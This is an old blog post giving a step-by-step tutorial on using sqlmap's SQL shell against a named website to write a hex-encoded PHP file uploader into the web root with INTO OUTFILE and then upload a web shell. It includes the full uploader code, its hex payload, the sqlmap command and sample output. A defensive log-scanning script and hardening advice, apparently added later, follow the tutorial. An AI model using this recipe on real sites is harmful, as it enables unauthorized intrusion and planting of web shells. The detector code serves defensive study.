Breaking

Wednesday 13 March 2013

SQLMAP and Uploading a Shell


Just a newbie who wants to share so we can all learn together.

Of course you all already know the tool called sqlmap; it's an awesome SQL injection tool for newbies like me, haha.

This time I want to share some newbie knowledge I picked up by copying from here and there: how to upload a shell using sqlmap.

First, of course, we need to have a target.
Here is my example target:

Quote:http://dewa-maho.com/tusuk.php?id=5

Then prepare your upload script. As an example, this is the script I'm going to upload:
PHP Code:
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>

But first, convert the script above to hex before it can be uploaded; the resulting hex string is what goes into the SELECT statement further down.

Open a terminal, then open sqlmap. If you don't have it yet, download it here:
Quote:http://sqlmap.org/

Next:
Quote:python sqlmap.py -u http://dewa-maho.com/tusuk.php?id=5 --sql-shell

Then something like this comes out:
Quote:[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>

Now type SELECT 0x'Hex' INTO OUTFILE "PATH/namaFile";
Don't forget to add '0x' in front of 'HEX'.
Quote:select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974 ​ 222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164 ​ 656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
into "/home/relax/public_html/upload.php";

Wait, and if you're lucky there will be a notification that the upload succeeded; if you're unlucky, well, try again, haha.

If it succeeded, go ahead and browse to the file we just wrote:
Quote:http://dewa-maho.com/upload.php

Then upload the shell...

Source: http://devilzc0de.org
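Seen from the defending side, the statement above leaves a recognizable trace in a MySQL query log: a hex literal selected into a file with a script extension. The detector below is an added example, not part of the original post; the log line layout, function names and sample lines are constructed assumptions.

```python
import re

# INTO OUTFILE/DUMPFILE '<path>' as it would appear in a logged query
OUTFILE_RE = re.compile(
    r"\binto\s+(?:outfile|dumpfile)\s*(['\"])(?P<path>.+?)\1", re.I | re.S)
# Only the 0x... literal form used on this page is handled
HEX_RE = re.compile(r"\b0x((?:[0-9a-f]{2})+)", re.I)
SCRIPT_EXT = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx")
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")


def decode_hex_literals(query):
    """Return the decoded bytes of every 0x... literal in the query."""
    return [bytes.fromhex(m.group(1)) for m in HEX_RE.finditer(query)]


def inspect_query(query):
    """Return a finding dict for a file-writing query, else None."""
    m = OUTFILE_RE.search(query)
    if not m:
        return None
    path = m.group("path")
    reasons = ["file write via INTO OUTFILE/DUMPFILE"]
    if path.lower().endswith(SCRIPT_EXT):
        reasons.append("target has a server-side script extension")
    for blob in decode_hex_literals(query):
        if any(mark in blob.lower() for mark in SCRIPT_MARKERS):
            reasons.append("hex literal decodes to script markup")
            break
    severity = "high" if len(reasons) > 1 else "medium"
    return {"path": path, "reasons": reasons, "severity": severity}


def scan(lines):
    """Return (line_number, finding) for every suspicious log line."""
    return [(n, f) for n, line in enumerate(lines, 1)
            if (f := inspect_query(line))]


# Constructed sample log lines (not taken from any real system)
_payload = b"<?php /* constructed sample */ ?>".hex()
SAMPLE_LOG = [
    "2013-03-13T15:35:06 12 Query SELECT name FROM items WHERE id=5",
    f"2013-03-13T15:36:10 12 Query select 0x{_payload} "
    "into outfile '/var/www/html/x.php'",
    "2013-03-13T15:40:00 14 Query SELECT * FROM report "
    "INTO OUTFILE '/tmp/report.csv'",
]
```

The write itself only succeeds when the injected database account holds the MySQL FILE privilege and `secure_file_priv` permits the target directory, so revoking FILE from application accounts and restricting `secure_file_priv` closes this path.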

1 comment:

  1. Thanks for the info, bro. Don't forget to visit back: http://www.stevin-germy.my.id
